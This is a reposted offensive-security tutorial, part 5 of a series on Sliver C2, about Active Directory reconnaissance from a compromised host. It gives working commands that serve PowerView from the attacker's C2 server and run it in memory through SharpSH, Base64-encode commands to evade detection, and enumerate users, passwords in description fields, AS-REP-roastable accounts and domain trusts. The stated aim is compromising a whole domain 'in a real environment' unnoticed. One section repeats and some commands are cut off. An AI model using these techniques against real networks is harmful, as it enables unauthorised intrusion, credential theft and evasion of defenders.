National Cyber Warfare Foundation (NCWF)

Building Command and Control (C2) Server During a Cyber War, Part 5 : Domain Reconnaissance
0 user ratings		2025-09-28 16:11:17
milo
Red Team (CNA)

Welcome back, cyberwarriors. We are continuing our session on Sliver C2 and practicing in a real environment. It’s always best to apply your skills in the real world, where you learn fast. Your actions must be well thought-out and careful to avoid detection. The goal is to gain knowledge about the environment you’ve entered and […]


The post Building Command and Control (C2) Server During a Cyber War, Part 5 : Domain Reconnaissance first appeared on Hackers Arise.







Welcome back, cyberwarriors.









We are continuing our session on Sliver C2 and practicing in a real environment. It’s always best to apply your skills in the real world, where you learn fast. Your actions must be well thought-out and careful to avoid detection. The goal is to gain knowledge about the environment you’ve entered and ultimately compromise the entire Active Directory. In this chapter, we will focus on Domain Reconnaissance.





In Active Directory, a domain is the fundamental logical boundary that organizes and manages objects such as users, computers, and security policies within a centralized directory service. It acts as both a security and administrative unit, enabling unified authentication, authorization, and resource control across all contained entities.





Domains allow administrators to enforce policies consistently across all domain-joined systems. Group Policy Objects (GPOs), login scripts, and access permissions are scoped by the domain boundary. Multiple domains can exist within a forest, which is the top-level container in an Active Directory structure. Domains in the same forest can establish two-way trust by default, allowing users in one domain to access resources in another, assuming permissions are configured accordingly.





Skipping domain reconnaissance is like trying to drive across town without a map. You waste time fumbling around and create unnecessary noise that can alert defenders. Reconnaissance reveals which accounts have elevated privileges, where domain controllers are located, and how machines interact. With this knowledge, you can choose optimal targets for implant deployment and lateral movement, all while minimizing detection risk.





PowerView





PowerView is a PowerShell-based tool designed to collect Active Directory information with minimal external dependencies. It offers numerous functions that query domain data via native Windows APIs, which helps maintain operational security by mimicking normal administrative activity.





To run PowerView, we first host the script on our C2 server using a simple Python web server. Then, we execute encoded commands with SharpSH.





Download PowerView





Let’s begin by downloading the script:





c2 > wget https://github.com/lucky-luk3/ActiveDirectory/blob/master/PowerView.ps1





HTTP Server





Next, start an HTTP server in the directory where PowerView.ps1 is saved:





c2 > python3 -m http.server





Encoding Commands





Convert your PowerView command into Base64 to avoid syntax issues and reduce detection. Renaming PowerView.ps1 to something more benign is also recommended:





c2 > echo -n “get-netuser | select samaccountname, description” | base64

















The command above queries domain users and retrieves their usernames and descriptions. Often, system administrators leave passwords in the description field, which is an invaluable opportunity for an attacker.





SharpSH





SharpSH is a .NET-based in-memory agent deployed by Sliver to execute scripts like PowerView without touching disk. It downloads PowerView from your hosted URL, runs it in memory, and sends output through the C2 channel. This technique avoids writing files to disk and runs within the .NET framework, making it difficult for antivirus or EDR solutions to detect.

















Get Domain Users





Using the Base64 string from earlier, we can now enumerate domain users:





sliver (session) > sharpsh — ‘-u http://C2:8000/PowerView.ps1 -e -c





















Scroll through the results. If passwords stored in account descriptions are still valid, these accounts may have excessive permissions or group memberships that can be abused for privilege escalation.





SharpView





SharpView is a C# rewrite of PowerView, offering the same functionality as a compiled .NET executable. Also, it doesn’t require command encoding.





Viewing Domain Information





You can gather domain information using SharpView:
sliver (session) > execute-assembly /root/tools/SharpView.exe “get-domain” -t 240 -i -E -M

















This command outputs the names of domain controllers. In our example, the domain controllers are running Windows Server 2008, which is severely outdated and vulnerable to many known exploits.





To obtain a more comprehensive overview of the domain:





sliver (session) > c2tc-domain-info

















This command reveals the domain controller’s IP, the domain’s password policy, and other data.





For stealthier enumeration, use native system binaries:
sliver (session) > execute -o powershell $Forest = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest(); $Forest.Domains

















Viewing AES-Reproastable Accounts





Accounts marked with “PreauthNotRequired” can be targeted with AS-REP roasting attacks. The attacker extracts crackable data without pre-authentication, which is then brute-forced offline without triggering failed login alerts:
sliver (session) > execute-assembly /root/tools/SharpView.exe “get-netuser -PreauthNotRequired” -t 240 -i -E -M

















Viewing AES-Reproastable Accounts





Accounts marked with “PreauthNotRequired” can be targeted with AS-REP roasting attacks. The attacker extracts crackable data without pre-authentication, which is then brute-forced offline without triggering failed login alerts:
sliver (session) > execute-assembly /root/tools/SharpView.exe “get-netuser -PreauthNotRequired” -t 240 -i -E -M





















Vulnerable certificate templates can be used for powerful persistence mechanisms. AD CS attacks are complex, but understanding them yields high-impact opportunities.





Network





Once inside the network, you should enumerate network adapters. This may reveal access to internal segments. Use Sliver’s ifconfig utility to retrieve adapter details without opening an interactive shell, reducing the risk of detection

















Domain Trusts





Domain trusts allow authentication across domains. If Domain A trusts Domain B, then B’s users can access A’s resources, depending on permissions. Attackers abuse these relationships by compromising accounts in low-security domains, then leveraging trusts to access high-value targets in more secure domains. For instance, compromising a service account in a child domain could grant access to the parent domain’s file shares or domain controllers, using legitimate Kerberos tickets.





SharpView & PowerView – Get-DomainTrust





To view trust relationships in the current domain:
sliver (session) > execute-assembly /root/tools/SharpView.exe “Get-DomainTrust” -t 240 -i -E -M

















SharpView & PowerView – Get-DomainTrustMapping





Unlike the previous command, Get-DomainTrustMapping goes beyond a single domain: it finds your current domain’s trusts, then follows referrals into trusted domains, mapping all reachable trusts
sliver (session) > execute-assembly /root/tools/SharpView.exe “Get-DomainTrustMapping” -t 240 -i -E -M





PowerShell





You can also use native PowerShell commands to inspect domain trust structures:





sliver (session) > execute -o powershell -Command “Get-ADTrust -Filter *”





If you have an active PowerShell session:
PS > Import-Module activedirectory
PS > Get-ADTrust -Filter *





Keep in mind, PowerShell process creation might be monitored in some environments.





Netdom





Another method is using netdom from the command prompt, which can be run in cmd. Unlike PowerShell, cmd is more stealthy, but process creation can still be logged:





C:\ > netdom query /domain:domain.ru trust





Conclusion





By thoroughly mapping a domain’s structure, privileges, and trust relationships, you gain the information needed to move stealthily toward full compromise. Tools like PowerView, SharpSH, SharpView, and native commands allow you to collect critical information without triggering alerts. Always validate the security posture of accounts, certificates, and domain configurations, because misconfigurations and outdated systems are the weak points that enable a successful breach.





The post Building Command and Control (C2) Server During a Cyber War, Part 5 : Domain Reconnaissance first appeared on Hackers Arise.



Source: HackersArise
Source Link: https://hackers-arise.com/building-command-and-control-c2-server-during-a-cyber-war-part-5-domain-reconnaissance/

Comments
new comment
Nobody has commented yet. Will you be the first?
  
Forum
Red Team (CNA)


Copyright 2012 through 2025 - National Cyber Warfare Foundation - All rights reserved worldwide.